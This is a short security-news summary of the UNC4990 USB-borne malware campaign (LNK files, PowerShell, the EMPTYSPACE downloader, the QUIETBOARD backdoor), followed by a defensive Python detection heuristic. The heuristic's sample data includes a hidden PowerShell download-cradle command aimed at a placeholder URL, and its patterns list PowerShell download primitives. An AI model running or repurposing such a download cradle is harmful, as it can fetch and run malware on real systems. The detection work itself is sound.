Summary:
UNC4990, a financially motivated threat actor, is using USB devices to infect victims. The group hosts parts of its tooling on popular, legitimate websites such as GitHub, GitLab, Ars Technica, and Vimeo. It uses the EMPTYSPACE downloader and the QUIETBOARD backdoor to execute payloads. The infection chain begins with USB drives that reach victims through social engineering. The victim opens a malicious LNK shortcut file, which runs a PowerShell script that fetches the EMPTYSPACE downloader. The actor has changed its tactics over time, for example replacing GitHub with Vimeo as a hosting site and embedding the payload in an image posted on Ars Technica. Multiple versions of the EMPTYSPACE loader and of the Python-based QUIETBOARD backdoor have been observed. Host-based and network-based indicators of compromise (IOCs) are provided.
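The chain summarised above (shortcut on a USB drive launches PowerShell, which fetches a stager from a legitimate hosting site) lends itself to a simple process-creation heuristic. The following is an added example, not code from the original article or the referenced report; it assumes Sysmon-style fields (image, parent image, command line, current directory), treats any non-C: drive letter as a likely removable volume, and uses the hosting domains named above as a constructed watch list.

```python
import re
from dataclasses import dataclass

# Domains the summary names as abused for staging (constructed watch list).
STAGING_HOSTS = ("github.com", "gitlab.com", "arstechnica.com", "vimeo.com")
# Common PowerShell download primitives.
DOWNLOAD_PRIMITIVES = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|Net\.WebClient)\b",
    re.IGNORECASE,
)
# Crude removable-media heuristic: any drive letter other than C: (assumption).
NON_SYSTEM_DRIVE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)


@dataclass
class ProcEvent:  # minimal Sysmon Event ID 1 style record (assumed field names)
    image: str
    parent_image: str
    command_line: str
    current_directory: str


def score_event(ev):
    """Return the list of reasons this process-creation event looks like the USB->LNK->PowerShell chain."""
    reasons = []
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons  # only PowerShell launches are of interest here
    if ev.parent_image.lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (typical of a double-clicked LNK)")
    if NON_SYSTEM_DRIVE.search(ev.current_directory) or NON_SYSTEM_DRIVE.search(ev.command_line):
        reasons.append("working directory or command line references a non-system drive")
    if DOWNLOAD_PRIMITIVES.search(ev.command_line):
        reasons.append("download primitive present in command line")
    if any(host in ev.command_line.lower() for host in STAGING_HOSTS):
        reasons.append("fetches from a legitimate hosting site known to be abused for staging")
    return reasons


def is_suspicious(ev, min_reasons=3):
    """Alert only when several weak signals coincide, to keep admin scripts from firing."""
    return len(score_event(ev)) >= min_reasons


def flag_events(events):
    return [ev for ev in events if is_suspicious(ev)]


# Constructed sample events: one benign admin script, one mimicking the described chain.
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\explorer.exe",
              "powershell.exe -File C:\\Users\\alice\\scripts\\backup.ps1", "C:\\Users\\alice"),
    ProcEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\explorer.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('https://vimeo.com/PLACEHOLDER')\"",
              "E:\\"),
]
```

Treat the output as a triage lead rather than a verdict: the drive-letter and domain checks are deliberately loose and should be paired with the host- and network-based IOCs the report provides.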
Hashtags: #cybersecurity #malware
https://cybersecuritynews.com/usb-malware-with-text-strings/